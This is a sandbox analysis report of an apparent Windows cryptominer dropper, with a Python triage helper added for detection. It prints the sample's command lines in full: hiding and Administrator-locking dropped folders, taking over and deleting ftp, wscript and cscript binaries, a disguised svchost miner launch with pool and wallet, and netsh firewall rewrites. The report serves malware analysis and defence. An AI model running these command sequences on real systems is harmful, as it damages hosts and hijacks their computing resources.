N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe

"C:\Users\Admin\AppData\Local\Temp\0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0N.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\Common Files\Microsoft Shared\eajbdcmd" /t /e /c /d administrator

C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe

"C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\0241FE~1.EXE > nul

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\takeown.exe

takeown /f c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\ftp.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Wscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\SysWOW64\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\Cscript.exe /grant administrators:F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\ftp.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Wscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\system32\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del /F /Q c:\windows\SysWOW64\Cscript.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\ProgramData\gambecxd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\ProgramData\gambecxd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\ProgramData\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\ProgramData\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\wk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\wk.ini" /t /e /c /d administrator

C:\ProgramData\gambecxd\svchost.exe

"C:\ProgramData\gambecxd\svchost.exe" -V -o xmr.crypto-pool.fr:443 -u 46SFbeVmsAAR8cFBJ3jjrqbvDheyLShJSfoiPDnoW2W2cimgZJaXCE7aKxgZ4AsUATe1ap4jHEGJ2E9jrYVf1Xb1CSAQDyU -p x -k -t 6

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Users\Public\Documents\gambecxd"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Users\Public\Documents\gambecxd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Users\Public\Documents\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Users\Public\Documents\gambecxd" /t /e /c /d administrator

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\attrib.exe

attrib +r +h +s "C:\Program Files\common files\system\jk.ini"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Windows\system32\cacls.exe

Cacls "C:\Program Files\common files\system\jk.ini" /t /e /c /d administrator

C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe

C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net start MpsSvc&cmd.exe /c sc config MpsSvc start= auto&cmd.exe /c netsh advfirewall set allprofiles state on&netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound&netsh advfirewall firewall delete rule name=all protocol=tcp localport=137&netsh advfirewall firewall delete rule name=all protocol=tcp localport=138&netsh advfirewall firewall delete rule name=all protocol=tcp localport=139&netsh advfirewall firewall delete rule name=all protocol=tcp localport=445&netsh advfirewall firewall delete rule name=all protocol=udp localport=137&netsh advfirewall firewall delete rule name=all protocol=udp localport=138&netsh advfirewall firewall delete rule name=all protocol=udp localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80&netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443
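
The process tree above is one procedure: the dropped directories under Program Files\Common Files, ProgramData and Public\Documents are set +r +h +s and then have Administrator denied via Cacls /d; ftp.exe, wscript.exe and cscript.exe in both system32 and SysWOW64 are taken over, re-ACLed and deleted; a renamed svchost.exe is launched with XMRig-style arguments against xmr.crypto-pool.fr:443; and the chained netsh command turns Windows Firewall on, blocks inbound NetBIOS/SMB (137-139, 445) and outbound TCP to a list of ports commonly used by mining pools (3333, 4444, 5555, 14444 and so on), while allowing outbound TCP 80, TCP 443 and UDP 53. The sample's own pool port, 443, is on the allow list. The Python triage helper below is an added example, not part of the sandbox report and not code from the sample: it splits the `&`-chained command line, tabulates the firewall rules it adds, lists the binaries that go through the full takeown, icacls, del sequence, finds the hidden-and-locked paths and the miner launch, and checks the miner's pool port against the outbound rules. The embedded command lines are copied from this report's Processes section and abridged to a representative subset (labelled as a constructed sample); the function names are the example's own.

```python
"""Triage helper for this report's process tree (added example, not sandbox output)."""
import re
import shlex
from collections import defaultdict

# Constructed sample: command lines copied from the Processes section above, abridged
# to a representative subset (the report removes six binaries and adds many more rules).
SAMPLE_CMDLINES = [
    'C:\\Windows\\system32\\cmd.exe /c attrib +r +h +s "C:\\Program Files\\Common Files\\Microsoft Shared\\eajbdcmd"',
    'Cacls "C:\\Program Files\\Common Files\\Microsoft Shared\\eajbdcmd" /t /e /c /d administrator',
    'takeown /f c:\\windows\\system32\\ftp.exe',
    'icacls c:\\windows\\system32\\ftp.exe /grant administrators:F',
    'C:\\Windows\\system32\\cmd.exe /c del /F /Q c:\\windows\\system32\\ftp.exe',
    'takeown /f c:\\windows\\SysWOW64\\Wscript.exe',
    'icacls c:\\windows\\SysWOW64\\Wscript.exe /grant administrators:F',
    'C:\\Windows\\system32\\cmd.exe /c del /F /Q c:\\windows\\SysWOW64\\Wscript.exe',
    '"C:\\ProgramData\\gambecxd\\svchost.exe" -V -o xmr.crypto-pool.fr:443 '
    '-u 46SFbeVmsAAR8cFBJ3jjrqbvDheyLShJSfoiPDnoW2W2cimgZJaXCE7aKxgZ4AsUATe1ap4jHEGJ2E9jrYVf1Xb1CSAQDyU -p x -k -t 6',
    'cmd.exe /c net start MpsSvc&cmd.exe /c sc config MpsSvc start= auto'
    '&netsh advfirewall firewall delete rule name=all protocol=tcp localport=445'
    '&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445'
    '&netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137'
    '&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333'
    '&netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444'
    '&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80'
    '&cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443',
]

# A leading 'cmd.exe /c' (bare or with its full path) is only a wrapper around the real command.
CMD_PREFIX = re.compile(r'^\s*(?:"[^"]*cmd\.exe"|\S*cmd\.exe)\s+/c\s+', re.IGNORECASE)

def split_chain(cmdline):
    """Split a cmd.exe line on '&' and strip the 'cmd.exe /c' wrappers."""
    parts = (CMD_PREFIX.sub('', p).strip() for p in cmdline.split('&'))
    return [p for p in parts if p]

def tokens(cmd):
    """Windows-style tokenisation: backslashes are literal, quotes group words and are dropped."""
    return [t.strip('"') for t in shlex.split(cmd, posix=False)]

def parse_netsh_rule(cmd):
    """(dir, action, protocol, port) for 'netsh advfirewall firewall add rule ...', else None."""
    toks = tokens(cmd)
    if [t.lower() for t in toks[:5]] != ['netsh', 'advfirewall', 'firewall', 'add', 'rule']:
        return None
    kv = dict(t.split('=', 1) for t in toks[5:] if '=' in t)
    port = kv.get('localport') or kv.get('remoteport')
    if port is None or not port.isdigit():
        return None
    return kv.get('dir', '').lower(), kv.get('action', '').lower(), kv.get('protocol', '').lower(), int(port)

def find_hidden_locked_paths(cmds):
    """Paths set +h +s with attrib and then denied to Administrator with Cacls /d."""
    seen = defaultdict(set)
    for cmd in cmds:
        low = [t.lower() for t in tokens(cmd)]
        if low and low[0] == 'attrib' and '+h' in low and '+s' in low:
            seen[low[-1]].add('hidden')
        elif low and low[0] == 'cacls' and '/d' in low:
            seen[low[1]].add('acl_denied')
    return sorted(p for p, s in seen.items() if s == {'hidden', 'acl_denied'})

def find_removed_binaries(cmds):
    """Files that go through the full takeown /f -> icacls /grant -> del sequence."""
    steps = defaultdict(set)
    for cmd in cmds:
        low = [t.lower() for t in tokens(cmd)]
        if low and low[0] == 'takeown' and '/f' in low:
            steps[low[low.index('/f') + 1]].add('takeown')
        elif low and low[0] == 'icacls' and '/grant' in low:
            steps[low[1]].add('icacls')
        elif low and low[0] == 'del':
            for target in (t for t in low[1:] if not t.startswith('/')):
                steps[target].add('del')
    return sorted(p for p, s in steps.items() if s == {'takeown', 'icacls', 'del'})

def find_miner(cmds):
    """Pick out an XMRig-style '-o pool:port -u wallet' launch."""
    for cmd in cmds:
        toks = tokens(cmd)
        if '-o' in toks and '-u' in toks:
            pool, _, port = toks[toks.index('-o') + 1].rpartition(':')
            return {'exe': toks[0], 'pool': pool, 'port': int(port), 'wallet': toks[toks.index('-u') + 1]}
    return None

def triage(cmdlines):
    """Run all checks; the miner's own pool port must survive the outbound rules it added."""
    cmds = [c for line in cmdlines for c in split_chain(line)]
    firewall = defaultdict(set)  # '<dir>_<action>' -> set of ports
    for rule in filter(None, map(parse_netsh_rule, cmds)):
        firewall[f'{rule[0]}_{rule[1]}'].add(rule[3])
    miner = find_miner(cmds)
    return {'hidden_locked_paths': find_hidden_locked_paths(cmds),
            'removed_binaries': find_removed_binaries(cmds),
            'firewall': dict(firewall), 'miner': miner,
            'miner_port_allowed': miner is not None and miner['port'] in firewall.get('out_allow', set())}

print(triage(SAMPLE_CMDLINES))
```

Run as-is it prints the triage dict for the embedded sample; feed it the process command lines from a live host's Sysmon or 4688 events to get the same summary there. The `removed_binaries` check deliberately requires all three steps (takeown, icacls, del) for the same path so that an administrator's one-off `takeown` does not trigger it, and `miner_port_allowed` is the quick confirmation that the firewall rules were written around the sample's own pool connection rather than as any kind of hardening.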

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wmic&exit&exit

C:\Windows\SysWOW64\net.exe

net start MpsSvc

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 start MpsSvc

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c sc config MpsSvc start= auto

C:\Windows\SysWOW64\sc.exe

sc config MpsSvc start= auto

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall set allprofiles firewallpolicy allowinbound,allowoutbound

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=tcp localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name=all protocol=udp localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=139

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=137

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=138

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=udp localport=139

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=in action=block protocol=TCP localport=445

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=2999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3000

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3001

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3002

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3003

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=3333

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=4444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=5555

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=6666

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=7777

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8888

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=9999

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=8080

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14444

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=block protocol=TCP remoteport=14433

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=80

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=UDP remoteport=53

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name=microsoft dir=out action=allow protocol=TCP remoteport=443

C:\Windows\SysWOW64\cmd.exe

cmd /c wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value >"C:\Program Files\ls.txt"&exit

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic process get caption,commandline,ExecutablePath,ProcessId,ParentProcessId /value

Network

Country Destination Domain Proto
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 xmr.djqwehuhfuiwe.xyz udp
US 8.8.8.8:53 udp

Files

C:\Program Files\Common Files\Microsoft Shared\eajbdcmd\Winlogon.exe

MD5 99d91a5ca408888ad0139ba017c263b0
SHA1 ee00c4cbb144833ea37557e09dab4d036cf491e3
SHA256 0241fed9dcf8aaad1825382591718a59f8a33255c7db87524fd5f4eb653626e0
SHA512 8910a22fe0a3a660e22fb8c8220abe6df6356eea3c342614dddb658bef7bc5c200fe605abdbde0ba50a61fa0e5fef9aae9f2bd083dff0bcfd4a204ed043bc164

C:\ProgramData\gambecxd\svchost.exe

MD5 d5f810d2810eb4412a5920a677d1bef1
SHA1 5d518c9c5b1097708b80ff572501e195b381c30c
SHA256 33ca0835da8d32f6e187f8a6376720fdf5e417530df7039d01841787cf513d51
SHA512 b308b9b8ba9d801fe0d0906401263621c7a84113277202feaad50d1e832e3af80131c8794e26ad61ee4c6e62e8404b343493c2186076c9ef6d584fb8b8f09663

C:\Program Files\common files\system\wk.ini

MD5 247dc790598a3bdce090350e7af3401c
SHA1 47798e3ff0b87d752aa3eabe974f8f1f295157cf
SHA256 3419ab77444269580f555533446263f2674a66a776d5171edd338f41c62bc28c
SHA512 4b1156c30fbdc6eb8fa067ffd9770607f333e4c18060d6557e196caa36c0c7f108e9051e00d29760b1c06033ab49b0791daad2c521a6c8bfd5f62eacb020081b

memory/4048-9-0x0000000000400000-0x0000000000498000-memory.dmp

C:\Users\Public\Documents\gambecxd\WmiPrvSE.exe

MD5 6a45590b819f385305ef39c912c134e8
SHA1 7916b19ad989ecd1eff12a7de52668f674335f2f
SHA256 e3258f7c8e2be3a5eeaa697b80fc1b3cc64b84a933e551c802c7479b86768db4
SHA512 1849029c7e433f5681848f0c8945d565873b2ec7164f9db71abbd3f5b59e3ad83b03f0be62666d2fc77b409565207500a2d29b30ce0a43aa8a67e7e999dd3dad

C:\Program Files\common files\system\jk.ini

MD5 82badd2e99953adcf4a57f34e8a174a0
SHA1 270d320eb655aef221e0cffd81aa51c94cad7771
SHA256 aca054455f96f96fc90b275b6a54f549267ed59fd56e3e6e5b5ef685e65ee6bc
SHA512 30595ae24dff1ad39c701bb7e6b53cd719ff4d4ac710b922cb43564636de4d4c400c07fb7e8a10eb4aaca0d47622b044651f46e1421897f20a4736aafed6a665

memory/2372-14-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/4048-16-0x0000000000400000-0x0000000000498000-memory.dmp

memory/2372-19-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Program Files\ls.txt

MD5 0412a1820b20f446e5fa3fc29e650514
SHA1 4dca3fc6f12dd9685d76752db2d5f20fbfa3813f
SHA256 9ec6fd2f1a39cb14281281fce280a6a05960e2d9339748cb2a3603b61ddaa377
SHA512 0509593450677fea2aad4d9587315fbd85872a650961948b21c50e785208c30741a936650892429b77a3291cad5e784017696fb920bf30ff0c3ab8e2d9213e3e

memory/2372-31-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/2372-37-0x0000000000400000-0x00000000004D3000-memory.dmp